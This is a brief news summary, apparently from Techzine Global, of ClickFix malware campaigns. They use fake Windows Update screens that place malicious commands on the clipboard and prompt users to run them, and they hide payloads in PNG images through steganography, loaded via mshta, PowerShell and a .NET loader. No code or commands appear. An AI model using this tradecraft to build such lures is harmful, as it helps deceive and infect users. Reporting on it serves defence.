"The techniques used in these campaigns are a clear evolution of previous ClickFix methods. Whereas previously commands were simply shared for users to copy themselves, now a script on the web page ensures that malicious instructions are automatically placed on the clipboard. The visitor is then instructed to press a key combination to complete the supposed update process. This causes the copied commands to be executed immediately in the Windows command prompt."
"A special feature of the latest variants is the use of steganography to hide the actual malware in images. The attackers do not process the malicious code as an addition to an existing file, but place fragments of the payload in the pixel structure of PNG images. According to researchers, specific color channels are manipulated in such a way that the final payload can only be reconstructed in memory when a loader written for this purpose becomes active."
New ClickFix campaigns present a convincing full-screen fake Windows Update interface that persuades users to perform update steps. The webpage automatically copies malicious commands to the clipboard, then instructs the visitor to press a key combination that runs those commands in the Windows command prompt. The campaigns hide malware payloads by embedding fragments into PNG pixel structures via steganography, manipulating specific color channels so reconstruction occurs only in memory. Initial execution commonly uses mshta to run JavaScript, followed by PowerShell scripts and a .NET assembly called Stego Loader containing encrypted resources used to reconstruct and load the payload.
Read at Techzine Global
Unable to calculate read time
Collection
[
|
...
]